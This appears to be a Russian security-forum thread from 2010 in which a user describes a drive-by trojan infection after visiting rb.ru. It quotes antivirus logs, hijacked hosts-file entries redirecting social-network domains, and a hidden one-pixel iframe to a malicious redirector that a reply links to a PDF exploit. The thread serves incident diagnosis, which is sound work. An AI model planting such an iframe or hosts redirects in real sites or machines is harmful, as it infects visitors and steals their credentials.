-
Junior Member
- Вес репутации
- 52
На rb.ru трояны!
После перехода с портала news.mail.ru на rb.ru (партнерские ссылки в верхней части страницы) последовали следующие события:
Сначала, как обычно завис Internet Explorer (это первый признак загрузки нежелательного ПО).
Хроника событий согласно Антивирусу Касперского:
Файловый антивирус:
22.05.2010 16:22:52 Файл: C:\Program Files\WebMoney\ImgUtil.dll обнаружено: троянская программа 'Trojan-Spy.Win32.Wemon.mt' (очередной вор Вебмани)
22.05.2010 16:23:48 C:\Documents and Settings\Илья\Local Settings\Temp\svchost.exe HKEY_USERS\S-1-5-21-1960408961-1757981266-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run start 1 C:\DOCUME~1\C6ED~1\LOCALS~1\Temp\svchost.exe Строка Unicode Создание обнаружено
22.05.2010 16:23:48 C:\Documents and Settings\Илья\Local Settings\Temp\svchost.exe HKEY_USERS\S-1-5-21-1960408961-1757981266-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Run start 1 C:\DOCUME~1\C6ED~1\LOCALS~1\Temp\svchost.exe Строка Unicode Создание запрещено
22.05.2010 16:23:54 C:\Documents and Settings\Илья\Local Settings\Temp\svchost.exe Программный модуль C:\5129914.exe установлен и запускается без ведома пользователя. Данное поведение характерно для троянских программ.
22.05.2010 16:23:54 C:\Documents and Settings\Илья\Local Settings\Temp\svchost.exe Действие запрещено.
Проактивная защита:
обнаружено: потенциально опасное ПО Hidden install Процесс: C:\Documents and Settings\Илья\Local Settings\Temp\svchost.exe -
Визуально было найдено 3 подозрительных файла: странный exe-шник с дерзкой иконкой в виде вопросительного знака на голубом фоне svchost.exe пытался изменить реестр и использовал порт TCP, до тех пор пока я не "убил" процесс. Его я удалил, и еще там же был e.exe, его тоже удалил. Производитель файлов - swarfwrqw3d2 
Еще был обнаружен программный модуль 5129914.exe прямо на локальном диске С (не в какой-либо папке, а просто так). Больше пока ничего не нашел. 
Хотелось бы знать, был ли это один комплекс, направленный на взлом Webmoney, или разные экземпляры вредоносного ПО?
Кстати, я крайне редко кликаю по всяким рекламным-партнерским ссылкам, но не предполагал что у известного портала mail.ru такие "солидные" партнеры (наряду с "Вестями", РИАновостями, РБК и пр), потакающие распространителям троянов .
В общем, обеспечил себе немного досуга Отсюда вывод - никому не верить и никуда не кликать лишний раз. Любопытство - зло!
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
См. еще в файле hosts:
89.187.51.9 vkontakte.ru
89.187.51.9 www.vkontakte.ru
89.187.51.9 www.odnoklassniki.ru
89.187.51.9 odnoklassniki.ru
-
-
А ведь парень прав есть там в коде и-фрейм оччень подозрительный
Код:
<iframe src="httр://dreekshervam.com/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="no" scrolling="no"></iframe>
Вот только выводы сделаны не верные. Нужно не не верить и не не кликать, а софт обновлять чаще Например тот софт что пдф файлы открывает
Добавлено через 0x25 минут
Бинго! Exploit.JS.Pdfka.cdg
обнаружено: троянская программа Exploit.JS.Pdfka.cdg файл: httр://aleshapopovitchment.com....
Касперский ловит.
Последний раз редактировалось XiTri; 23.05.2010 в 19:31.
Причина: Добавлено
-
Ответить с цитированием
